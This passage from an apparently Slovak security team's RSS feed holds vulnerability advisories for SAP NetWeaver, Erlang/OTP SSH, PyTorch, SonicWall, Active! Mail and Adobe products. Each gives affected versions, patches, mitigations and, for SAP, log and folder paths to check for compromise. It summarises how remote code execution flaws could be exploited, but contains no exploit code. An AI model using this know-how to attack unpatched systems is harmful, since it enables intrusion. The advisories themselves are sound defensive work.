<p>Administrátorom odporúčame vykonať bezodkladnú <strong>inštaláciu bezpečnostnej záplaty SAP Security Note 3594142</strong>. Zraniteľnosť je možné dočasne mitigovať aj deaktiváciou komponentu Visual Composer, vypnutím aliasu developmentserver a&nbsp;limitovaním prístupu k&nbsp;URL /developmentserver/metadatauploader.</p>



<p>Rovnako odporúčame <strong>preveriť prítomnosť pokusov o&nbsp;zneužitie zraniteľnosti</strong>, ktoré možno rozdeliť do dvoch fáz. Prvá fáza spočíva v&nbsp;<strong>kontrole logov SAP NetWeaver, webového servera, sieťových a&nbsp;bezpečnostných prvkov</strong>. Zamerajte sa na hľadanie HTTP POST požiadaviek na /developmentserver/metadatauploader. Druhá fáza spočíva v&nbsp;<strong>kontrole obsahu priečinka</strong> /j2ee/cluster/apps/sapcom/irj/servlet_jsp/irj/root/ na serveri SAP NetWeaver, do ktorého sú nahrávané súbory pri zneužití zraniteľnosti. Kompletný návod na preverenie prítomnosti pokusov o&nbsp;zneužitie zraniteľnosti môžete nájsť na stránkach bezpečnostných výskumníkov z&nbsp;<a href="https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/">ReliaQuest</a> a&nbsp;<a href="https://redrays.io/blog/critical-sap-netweaver-vulnerability-cve-2025-31324-fixed-actively-exploited-in-the-wild/">RedRays</a>.</p>



<p><strong>V&nbsp;prípade pozitívnych nálezov je potrebné systém považovať za kompromitovaný, izolovať ho a&nbsp;započať relevantné procesy pre riešenie incidentu.</strong></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://me.sap.com/notes/3594142">https://me.sap.com/notes/3594142</a> (vyžaduje prihlásenie do zákazníckeho portálu SAP)</li>



<li><a href="https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/">https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/</a></li>



<li><a href="https://redrays.io/blog/critical-sap-netweaver-vulnerability-cve-2025-31324-fixed-actively-exploited-in-the-wild/">https://redrays.io/blog/critical-sap-netweaver-vulnerability-cve-2025-31324-fixed-actively-exploited-in-the-wild/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2325/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v knižnici Erlang/OTP</title>
		<link>/posts/2322</link>
					<comments>/posts/2322#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 25 Apr 2025 14:22:45 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Erlang/OTP]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2322</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/04/erlang-1024x739.png" alt="" /></p>Vývojári knižnice Erlang OTP (Open Telecom Platform) vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť v&#160;serverovom komponente SSH. Zraniteľnosť...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/04/erlang-1024x739.png" alt="" /></p>
<p><strong>Vývojári knižnice Erlang OTP (Open Telecom Platform) vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť v&nbsp;serverovom komponente SSH. Zraniteľnosť s&nbsp;identifikátorom CVE-2025-32433 možno zneužiť na vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Knižnica Erlang/OTP vo verziách starších ako 27.3.3</li>



<li>Knižnica Erlang/OTP vo verziách starších ako 26.2.5.11</li>



<li>Knižnica Erlang/OTP vo verziách starších ako 25.3.2.20</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-32433 </strong><strong>&nbsp;</strong>(CVSS 3.1 skóre: 10,0)</p>



<p>Kritická zraniteľnosť spočíva v&nbsp;nesprávnom spracovaní správ protokolu SSH, ktoré umožňuje zaslanie správ protokolu pripojenia ešte pred samotnou autentifikáciou používateľa. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na <strong>vzdialené vykonanie kódu v&nbsp;kontexte SSH démona</strong> a&nbsp;<strong>získanie úplnej kontroly nad Erlang/OTP SSH serverom</strong>.</p>



<p><strong>Na uvedenú zraniteľnosť je v&nbsp;súčasnosti dostupný aj Proof-of-Concept kód</strong> demonštrujúci spôsob jej zneužitia.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame uistiť sa, či Vaše aplikácie a&nbsp;služby nevyužívajú SSH servery založené na zraniteľných verziách knižnice. V&nbsp;prípade, že áno, odporúčame vykonať bezodkladnú aktualizáciu knižnice Erlang/OTP na verzie 27.3.3, 26.2.5.11 alebo 25.3.2.20.</p>



<p>V&nbsp;prípade, že aktualizáciu systémov nie je možné vykonať, zraniteľnosť je možné mitigovať aj limitovaním sieťovej komunikácie len na dôveryhodné zdroje.</p>



<p>Uvedená knižnica je súčasťou produktov viacerých výrobcov, vrátane systémov ICS (Industrial Control Systems) a&nbsp;OT (Operational Technology). Výrobcovia pracujú na zapracovaní aktualizácií do svojich produktov. <a href="https://arcticwolf.com/resources/blog/cve-2025-32433/">Čiastočný zoznam produktov využívajúcich túto knižnicu</a> možno nájsť na stránke bezpečnostných výskumníkov zo spoločnosti Arctic Wolf, v&nbsp;časti Potentionally Affected Third-Party Software.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2">https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2</a></li>



<li><a href="https://www.openwall.com/lists/oss-security/2025/04/16/2">https://www.openwall.com/lists/oss-security/2025/04/16/2</a></li>



<li><a href="https://thehackernews.com/2025/04/critical-erlangotp-ssh-vulnerability.html">https://thehackernews.com/2025/04/critical-erlangotp-ssh-vulnerability.html</a></li>



<li><a href="https://securityonline.info/erlang-otp-cve-2025-32433-cvss-10-critical-ssh-flaw-allows-unauthenticated-rce/">https://securityonline.info/erlang-otp-cve-2025-32433-cvss-10-critical-ssh-flaw-allows-unauthenticated-rce/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2322/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť vo frameworku PyTorch</title>
		<link>/posts/2319</link>
					<comments>/posts/2319#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 25 Apr 2025 14:19:43 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[PyTorch]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2319</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/04/pytorch-1024x659.png" alt="" /></p>Vývojári pythonového open-source frameworku pre strojové učenie PyTorch vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť. CVE-2025-32434 možno zneužiť...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/04/pytorch-1024x659.png" alt="" /></p>
<p><strong>Vývojári pythonového open-source frameworku pre strojové učenie PyTorch vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť. CVE-2025-32434 možno zneužiť na vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>PyTorch vo verziách 2.5.1 a starších</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-32434 </strong><strong>&nbsp;</strong>(CVSS 4.0 skóre: 9,3)</p>



<p>Kritická zraniteľnosť sa nachádza vo funkcii <em>torch.load()</em>, ktorá je používaná na načítavanie modelov a&nbsp;spočíva v&nbsp;deserializácii nedôveryhodných údajov. Vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvoreného modelu mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong>Pozn.: Zraniteľnosť je možné zneužiť aj v&nbsp;prípade volania funkcie s&nbsp;parametrom <em>weights_only=True</em>, ktorý bol doteraz považovaný za bezpečný.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame uistiť sa, či Vaše aplikácie a&nbsp;služby nevyužívajú zraniteľné verzie knižnice PyTorch. V&nbsp;prípade, že áno, odporúčame vykonať bezodkladnú aktualizáciu knižnice na verziu 2.6.0.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://github.com/pytorch/pytorch/security/advisories/GHSA-53q9-r3pm-6pq6">https://github.com/pytorch/pytorch/security/advisories/GHSA-53q9-r3pm-6pq6</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-32434">https://nvd.nist.gov/vuln/detail/CVE-2025-32434</a></li>



<li><a href="https://securityonline.info/critical-pytorch-vulnerability-cve-2025-32434-allows-remote-code-execution/">https://securityonline.info/critical-pytorch-vulnerability-cve-2025-32434-allows-remote-code-execution/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2319/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v SonicWall SonicOS SSLVPN</title>
		<link>/posts/2317</link>
					<comments>/posts/2317#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 25 Apr 2025 14:17:34 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[SonicWall]]></category>
		<guid isPermaLink="false">/?p=2317</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/sonicwall-1.png" alt="" /></p>Spoločnosť SonicWall vydala bezpečnostné aktualizácie svojho operačného systému SonicOS, ktoré opravujú vysoko závažnú zraniteľnosť v&#160;rozhraní SSLVPN Virtual Office. CVE-2025-32818 by...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/sonicwall-1.png" alt="" /></p>
<p><strong>Spoločnosť SonicWall vydala bezpečnostné aktualizácie svojho operačného systému SonicOS, ktoré opravujú vysoko závažnú zraniteľnosť v&nbsp;rozhraní SSLVPN Virtual Office. CVE-2025-32818 by vzdialený neautentifikovaný útočník mohol zneužiť na zneprístupnenie služby.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Zariadenia série Gen7 NSv (NSv 270, NSv 470, NSv 870) so SonicOS vo verzii firmvéru 7.1.1-7040 až 7.1.3-7015</li>



<li>Zariadenia série Gen7 Firewalls (TZ270, TZ270W, TZ370, TZ370W, TZ470, TZ470W, TZ570, TZ570W, TZ570P, TZ670, NSa 2700, NSa 3700,NSa 4700, NSa 5700, NSa 6700, NSsp 10700, NSsp 11700, NSsp 13700, NSsp 15700) so SonicOS vo verzii firmvéru firmvéru 7.1.1-7040 až 7.1.3-7015</li>



<li>Zariadenia série TZ80 so SonicOS vo verzii firmvéru 8.0.0-8037 a staršej</li>
</ul>



<p>Pozn.: Zraniteľnosť je možné zneužiť len na zariadeniach, na ktorých je aktivovaná služba SSLVPN.</p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-32818 </strong><strong>&nbsp;</strong>(CVSS 3.1 skóre: 7,5)</p>



<p>Vysoko závažná zraniteľnosť s&nbsp;identifikátorom CVE-2025-32818 sa nachádza v&nbsp;rozhraní SSLVPN Virtual Office systému SonicOS a&nbsp;spočíva v&nbsp;dereferencii nulového ukazovateľa. Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených požiadaviek mohol zneužiť na vyvolanie <strong>pádu firewallu vedúci k&nbsp;zneprístupneniu služby</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Zneprístupnenie služby (DoS)</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať aktualizáciu firmvéru zraniteľných zariadení na verzie 7.2.0-7015 (Gen7 Firewalls a&nbsp;Gen7 NSv), 8.0.1-8017 (TZ80) alebo novšie.</p>



<p>V&nbsp;prípade, že aktualizáciu systémov nie je možné vykonať, zraniteľnosť je možné mitigovať aj deaktiváciou služby SSLVPN.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0009">https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0009</a></li>



<li><a href="https://securityonline.info/high-severity-sonicwall-sslvpn-vulnerability-allows-firewall-crashing/">https://securityonline.info/high-severity-sonicwall-sslvpn-vulnerability-allows-firewall-crashing/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2317/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Active! Mail má kritickú zero-day zraniteľnosť</title>
		<link>/posts/2314</link>
					<comments>/posts/2314#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 24 Apr 2025 09:38:58 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Active! Mail]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2314</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/04/Active-mail.png" alt="" /></p>Spoločnosť Qualitia opravila kritickú zraniteľnosť v&#160;mailovom klientovi Active! Mail, ktorá umožňuje vzdialené vykonávanie kódu. Zraniteľnosť útočníci aktívne zneužívajú. Zraniteľné systémy:...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/04/Active-mail.png" alt="" /></p>
<p><strong>Spoločnosť Qualitia opravila kritickú zraniteľnosť v&nbsp;mailovom klientovi Active! Mail, ktorá umožňuje vzdialené vykonávanie kódu. Zraniteľnosť útočníci aktívne zneužívajú.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Active! Mail BuildInfo: 6.60.05008561 a staršie</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-42599 </strong>(CVSS skóre 9,8)</p>



<p>Vývojári webového mailového klienta Active! Mail opravili kritickú aktívne zneužívanú zraniteľnosť, ktorá umožňuje vzdialené vykonávanie kódu, alebo môže spôsobiť nedostupnosť služby. Chyba spočíva v pretečení medzipamäte zásobníka. Vzdialený neautentifikovaný útočník ju môže zneužiť odoslaním špeciálne vytvorenej požiadavky zraniteľnej inštancii servera Active! Mail. Interakcia používateľa nie je potrebná.</p>



<p>Aplikácia je obľúbená najmä v japonsko-jazyčnom prostredí.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Nedostupnosť služby (DoS)</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Active! Mail aspoň na verziu BuildInfo: 6.60.06008562.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.bleepingcomputer.com/news/security/active-mail-rce-flaw-exploited-in-attacks-on-japanese-orgs/">https://www.bleepingcomputer.com/news/security/active-mail-rce-flaw-exploited-in-attacks-on-japanese-orgs/</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-42599">https://nvd.nist.gov/vuln/detail/CVE-2025-42599</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2314/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické bezpečnostné zraniteľnosti v produktoch Adobe</title>
		<link>/posts/2312</link>
					<comments>/posts/2312#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 22 Apr 2025 11:32:04 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Adobe]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2312</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/09/Adobe.png" alt="" /></p>Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoje produkty ColdFusion, After Effects, Media Encoder, Bridge, Experience Manager (AEM) Forms on JEE,...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/09/Adobe.png" alt="" /></p>
<p><strong>Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoje produkty ColdFusion, After Effects, Media Encoder, Bridge, Experience Manager (AEM) Forms on JEE, Premiere Pro, Photoshop, Animate, Experience Manager (AEM) Screens, FrameMaker, XMP-Toolkit-SDK, Commerce, Commerce&nbsp; B2B a Magento Open Source, ktoré opravujú 58 zraniteľností, z&nbsp;čoho 28 je označených ako kritické. Najzávažnejšie kritické zraniteľnosti by vzdialený útočník mohol zneužiť na získanie neoprávneného prístupu k&nbsp;citlivým údajom a&nbsp;vykonanie škodlivého kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Adobe ColdFusion 2025 vo verziách starších ako Update 1</li>



<li>Adobe ColdFusion 2023 vo verziách starších ako Update 13</li>



<li>Adobe ColdFusion 2021 vo verziách starších ako Update 19</li>



<li>Adobe After Effects 24.6.X vo verziách starších ako 24.6.5</li>



<li>Adobe After Effects 25.X vo verziách starších ako 25.2</li>



<li>Adobe Media Encoder 24.6.X vo verziách starších ako 24.6.5</li>



<li>Adobe Media Encoder 25.X vo verziách starších ako 25.2</li>



<li>Adobe Bridge 14.1.X vo verziách starších ako 14.1.6</li>



<li>Adobe Bridge 15.0.X vo verziách starších ako 15.0.3</li>



<li>Adobe Experience Manager (AEM) Forms on JEE vo verziách starších ako 6.5.22.0 (AEMForms-6.5.0-0095)</li>



<li>Adobe Premiere Pro 24.6.X vo verziách starších ako 24.6.5</li>



<li>Adobe Premiere Pro 25.X vo verziách starších ako 25.2</li>



<li>Adobe Photoshop 2025 vo verziách starších ako 26.5</li>



<li>Adobe Photoshop 2024 vo verziách starších ako 25.12.2</li>



<li>Adobe Animate  2023 vo verziách starších ako 23.0.11</li>



<li>Adobe Animate  2024 vo verziách starších ako 24.0.8</li>



<li>Adobe Experience Manager (AEM) Screens vo verziách starších ako AEM 6.5 Screens FP11.4</li>



<li>Adobe FrameMaker 2020 vo verziách starších ako Update 8</li>



<li>Adobe FrameMaker 2022 vo verziách starších ako Update 6</li>



<li>Adobe XMP-Toolkit-SDK vo verziách starších ako 2025.03</li>



<li>Adobe Commerce vo verziách starších ako 2.4.8</li>



<li>Adobe Commerce 2.4.7-XXvo verziách starších ako 2.4.7-p5</li>



<li>Adobe Commerce 2.4.6-XX vo verziách starších ako 2.4.6-p10</li>



<li>Adobe Commerce 2.4.5-XX vo verziách starších ako 2.4.5-p12</li>



<li>Adobe Commerce 2.4.4-XX vo verziách starších ako 2.4.4-p13</li>



<li>Adobe Commerce B2B vo verziách starších ako 1.5.2</li>



<li>Adobe Commerce B2B 1.4.2-XX vo verziách starších ako 1.4.2-p5</li>



<li>Adobe Commerce B2B 1.3.5-XX vo verziách starších ako 1.3.5-p10</li>



<li>Adobe Commerce B2B 1.3.4-XX vo verziách starších ako 1.3.4-p12</li>



<li>Adobe Commerce B2B 1.3.3-XX vo verziách starších ako 1.3.3-p13</li>



<li>Magento Open Source vo verziách starších ako 2.4.8</li>



<li>Magento Open Source 2.4.7-XX vo verziách starších ako 2.4.7-p5</li>



<li>Magento Open Source 2.4.6-XX vo verziách starších ako 2.4.6-p10</li>



<li>Magento Open Source 2.4.5-XX vo verziách starších ako 2.4.5-p12</li>



<li>Magento Open Source 2.4.4-XX vo verziách starších ako 2.4.4-p13</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>Adobe ColdFusion:</u></strong></p>



<p><strong>CVE-2025-24447, CVE-2025-30282 </strong>(CVSS skóre 9,1); <strong>CVE-2025-30287 </strong>(CVSS skóre 8,1)<strong>; CVE-2025-30284, CVE-2025-30285, CVE-2025-30286 </strong>(CVSS skóre 8,0);<strong> CVE-2025-30289 </strong>(CVSS skóre 7,5)</p>



<p>Kritické zraniteľnosti spočívajú v&nbsp;deserializácii nedôveryhodných dát (CVE-2025-24447, CVE-2025-30284, CVE-2025-30285), nesprávnej autentifikácii (CVE-2025-30282, CVE-2025-30287) a&nbsp;nedostatočnej neutralizácii špeciálnych elementov v&nbsp;rámci príkazov operačného systému (CVE-2025-30286, CVE-2025-30289). Vzdialený útočník by ich mohol zneužiť na <strong>vykonanie škodlivého kódu</strong>.</p>



<p><strong>CVE-2025-24446, CVE-2025-30281 </strong>(CVSS skóre 9,1)</p>



<p>Kritické zraniteľnosti v&nbsp;produkte Adobe Coldfusion spočívajú v&nbsp;nedostatočnom overovaní používateľských vstupov (CVE-2025-24446) a&nbsp;nesprávnom riadení prístupu (CVE-2025-30281). Vzdialený autentifikovaný používateľ by ich mohol zneužiť na <strong>čítanie obsahu ľubovoľných súborov na súborovom systéme</strong> a&nbsp;<strong>získanie neoprávneného prístupu k&nbsp;citlivým údajom</strong>.</p>



<p><strong>CVE-2025-30290</strong> (CVSS skóre 7,8), <strong>CVE-2025-30288</strong> (CVSS skóre 7,8)</p>



<p>Zraniteľnosti spočívajúce v&nbsp;nesprávnom riadení prístupu (CVE-2025-30288) a&nbsp;nesprávnom limitovaní prístupov k&nbsp;priečinkom s&nbsp;obmedzeným prístupom (eng. Restricted Directories) (CVE-2025-30290) by útočník mohol zneužiť na <strong>obídenie bezpečnostných prvkov</strong> a&nbsp;<strong>narušenie dôvernosti, integrity a&nbsp;dostupnosti systému</strong>.</p>



<p><strong><u>Adobe After Effects:</u></strong></p>



<p><strong>CVE-2025-27182, CVE-2025-27183 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosti spočívajúce v&nbsp;použití v&nbsp;zápise mimo povolených hodnôt pamäte umožňujú <strong>vykonanie škodlivého kódu</strong>.</p>



<p><strong><u>Adobe Media Encoder:</u></strong></p>



<p><strong>CVE-2025-27194, CVE-2025-27195 </strong>(CVSS skóre 7,8)</p>



<p>CVE-2025-27194 spočíva v&nbsp;zápise mimo povolených hodnôt v&nbsp;pamäti a CVE-2025-27195 v&nbsp;pretečením medzipamäte haldy. Obe zraniteľnosti by vzdialený neautentifikovaný útočník podvrhnutím špeciálne vytvorených súborov mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong><u>Adobe Bridge:</u></strong></p>



<p><strong>CVE-2025-27193 </strong>(CVSS skóre 7,8)</p>



<p>Pretečenie medzipamäte haldy v&nbsp;produkte Adobe Bridge možno zneužiť na <strong>vykonanie škodlivého kódu</strong>.</p>



<p><strong><u>Adobe Experience Manager Forms:</u></strong></p>



<p><strong>CVE-2024-38819, CVE-2024-38820 </strong>(CVSS skóre 7,5)</p>



<p>Zraniteľnosti v&nbsp;externom frameworku Spring možno zneužiť na získanie <strong>neoprávneného prístupu k&nbsp;citlivým údajom</strong>.</p>



<p><strong><u>Adobe Premiere Pro:</u></strong></p>



<p><strong>CVE-2025-27196 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosť s&nbsp;identifikátorom CVE-2025-27196 spočíva v&nbsp;pretečení medzipamäte haldy a&nbsp;vzdialený neautentifikovaný útočník by ju mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí otvoriť špeciálne vytvorený súbor.</p>



<p><strong><u>Adobe Animate:</u></strong></p>



<p><strong>CVE-2025-27199, CVE-2025-27200 </strong>(CVSS skóre 7,8)</p>



<p>Pretečenie medzipamäte haldy (CVE-2025-27199) a&nbsp;použitie odalokovaného miesta v&nbsp;pamäti (CVE-2025-27200) možno zneužiť na <strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong><u>Adobe Photoshop:</u></strong></p>



<p><strong>CVE-2025-27198 </strong>(CVSS skóre 7,8)</p>



<p>Kritická zraniteľnosť s&nbsp;identifikátorom CVE-2025-27198 spočíva v&nbsp;pretečení medzipamäte haldy a&nbsp;možno ju zneužiť na <strong>vykonanie kódu</strong>.</p>



<p><strong><u>Adobe FrameMaker:</u></strong></p>



<p><strong>CVE-2025-30304, CVE-2025-30295, CVE-2025-30296, CVE-2025-30297, CVE-2025-30298, CVE-2025-30299 </strong>(CVSS skóre 7,8)</p>



<p>Kritické zraniteľnosti v&nbsp;Adobe FrameMaker možno zneužiť na <strong>vzdialené vykonanie kódu</strong>. Predmetné zraniteľnosti spočívajú v&nbsp;zápise mimo povolených hodnôt (CVE-2025-30304, CVE-2025-30297), pretečení medzipamäte haldy (CVE-2025-30295, CVE-2025-30299), podtečení celočíselnej premennej (CVE-2025-30296) a pretečení vyrovnávacej pamäte zásobníka (CVE-2025-30298).</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonanie škodlivého kódu</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Obídenie bezpečnostného prvku</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>



<li><strong>Eskalácia privilégií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov na verzie špecifikované v&nbsp;časti Zraniteľné systémy alebo&nbsp;na webových stránkach výrobcu uvedených v&nbsp;časti Zdroje. Zároveň odporúčame poučiť používateľov, aby neotvárali správy a&nbsp;prílohy z&nbsp;neznámych a&nbsp;nedôveryhodných zdrojov.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://helpx.adobe.com/security/products/coldfusion/apsb25-15.html">https://helpx.adobe.com/security/products/coldfusion/apsb25-15.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/after_effects/apsb25-23.html">https://helpx.adobe.com/security/products/after_effects/apsb25-23.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/media-encoder/apsb25-24.html">https://helpx.adobe.com/security/products/media-encoder/apsb25-24.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/bridge/apsb25-25.html">https://helpx.adobe.com/security/products/bridge/apsb25-25.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/magento/apsb25-26.html">https://helpx.adobe.com/security/products/magento/apsb25-26.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/aem-forms/apsb25-27.html">https://helpx.adobe.com/security/products/aem-forms/apsb25-27.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/premiere_pro/apsb25-28.html">https://helpx.adobe.com/security/products/premiere_pro/apsb25-28.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/photoshop/apsb25-30.html">https://helpx.adobe.com/security/products/photoshop/apsb25-30.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/animate/apsb25-31.html">https://helpx.adobe.com/security/products/animate/apsb25-31.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/aem-screens/apsb25-32.html">https://helpx.adobe.com/security/products/aem-screens/apsb25-32.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/framemaker/apsb25-33.html">https://helpx.adobe.com/security/products/framemaker/apsb25-33.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/xmpcore/apsb25-34.html">https://helpx.adobe.com/security/products/xmpcore/apsb25-34.html</a></li>



<li><a href="https://thehackernews.com/2025/04/adobe-patches-11-critical-coldfusion.html">https://thehackernews.com/2025/04/adobe-patches-11-critical-coldfusion.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2312/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v zariadeniach Fortinet FortiSwitch</title>
		<link>/posts/2310</link>
					<comments>/posts/2310#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 22 Apr 2025 11:30:43 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Fortinet]]></category>
		<category><![CDATA[FortiSwitch]]></category>
		<category><![CDATA[information disclosure]]></category>
		<guid isPermaLink="false">/?p=2310</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>Spoločnosť Fortinet vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť v&#160;zariadeniach FortiSwitch. Zraniteľnosť možno zneužiť na neoprávnenú zmenu prihlasovacích údajov administrátorských...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>
<p><strong>Spoločnosť Fortinet vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť v&nbsp;zariadeniach FortiSwitch. Zraniteľnosť možno zneužiť na neoprávnenú zmenu prihlasovacích údajov administrátorských účtov a&nbsp;následné získanie úplnej kontroly nad systémom.</strong></p>



